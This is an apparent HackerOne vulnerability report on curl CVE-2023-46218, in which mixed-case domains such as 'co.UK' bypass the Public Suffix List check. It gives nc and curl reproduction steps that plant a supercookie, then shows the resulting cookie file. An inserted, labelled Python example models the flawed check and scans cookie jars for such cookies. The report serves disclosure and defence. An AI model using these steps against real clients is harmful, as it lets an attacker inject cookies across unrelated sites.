hackerone | nyymi | H1:2212193
Oct 16, 2023 - 6:28 p.m.

curl: CVE-2023-46218: cookie mixed case PSL bypass

2023-10-16 18:28:56
nyymi
hackerone.com
61
libcurl
vulnerability
cookie bypass
psl check
domain normalization
cookie_domain
mixed case
host header
supercookie
impact
bugbounty

AI Score: 6.3

Confidence: High

EPSS: 0.001

Percentile: 30.9%

Summary:

libcurl fails to normalize the hostname and cookie_domain parameters passed to the psl_is_cookie_domain_acceptable function. As a result, a malicious site can set a supercookie if the victim requests the URL with a hostname that contains any uppercase characters in its domain part.

The libpsl psl_is_cookie_domain_acceptable documentation (https://rockdaboot.github.io/libpsl/libpsl-Public-Suffix-List-functions.html#psl-is-cookie-domain-acceptable) says the following:

Use helper function psl_str_to_utf8lower() for normalization of hostname and cookie_domain.

This normalization is not done correctly, so domains containing uppercase characters bypass the PSL check. Note that curl itself later ignores the cookie domain's capitalization and will match even an all-lowercase hostname against the stored supercookie's mixed-case domain.

It's also worth noting that the request Host header reveals the mixed case used, which lets the attacker prepare the correct Set-Cookie domain for the attack.

Steps To Reproduce:

  1. echo -ne "HTTP/1.1 200 OK\r\nSet-Cookie: super=oops; domain=co.UK\r\nContent-Length: 0\r\n" | nc -v -l -q 1 -p 8888
  2. curl -v -c c.txt --resolve test.co.uk:8888:testserverip http://test.co.UK:8888
  3. nc -v -l -p 7777
  4. curl -v -b c.txt --resolve other.co.uk:7777:testserverip http://other.co.uk:7777

Note that the supercookie is sent to the other.co.uk site. In fact it will now be sent to any .co.uk host.

The generated cookie file:

# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

.co.UK	TRUE	/	FALSE	0	super	oops
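The following is an added example, not code from curl or libpsl: it models the PSL acceptability check with and without the lowercasing the libpsl documentation asks for, reproducing the co.UK bypass described above, and then scans a Netscape-format cookie jar like the one shown for cookies scoped to a public suffix. The public suffix subset and the sample jar are constructed for the demonstration.

```python
# Added example (not curl's or libpsl's code). The PSL subset below is an
# assumption: just enough rules to cover the co.uk case from the report.
PUBLIC_SUFFIXES = {"uk", "co.uk", "com"}


def is_public_suffix(domain: str) -> bool:
    # Real PSL data is lowercase; a case-sensitive lookup misses "co.UK".
    return domain.lstrip(".") in PUBLIC_SUFFIXES


def cookie_domain_acceptable(hostname: str, cookie_domain: str, normalize: bool) -> bool:
    """Model of a PSL check. With normalize=False it behaves like the vulnerable
    path in the report: 'co.UK' is not found among the lowercase suffixes, so a
    whole public suffix is accepted as a cookie domain."""
    if normalize:
        hostname, cookie_domain = hostname.lower(), cookie_domain.lower()
    cookie_domain = cookie_domain.lstrip(".")
    if is_public_suffix(cookie_domain):
        return False  # never scope a cookie to an entire public suffix
    # The host must be the cookie domain itself or a subdomain of it.
    return hostname == cookie_domain or hostname.endswith("." + cookie_domain)


def supercookies_in_jar(jar_text: str) -> list:
    """Return (domain, name) pairs from a Netscape cookie file whose domain is
    a public suffix once lowercased, i.e. cookies that would be sent to every
    host under that suffix."""
    found = []
    for line in jar_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split("\t")  # domain, flag, path, secure, expiry, name, value
        if len(fields) < 7:
            continue
        domain, name = fields[0], fields[5]
        if is_public_suffix(domain.lower()):
            found.append((domain, name))
    return found


# Constructed cookie jar mirroring the one generated in the report.
SAMPLE_JAR = (
    "# Netscape HTTP Cookie File\n"
    ".co.UK\tTRUE\t/\tFALSE\t0\tsuper\toops\n"
    "test.co.uk\tFALSE\t/\tFALSE\t0\tsession\tabc\n"
)
```

Running supercookies_in_jar over a real cookie jar is a quick way to check whether a client has already stored a cookie scoped to a public suffix.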

Impact:

Bypassing supercookie protection.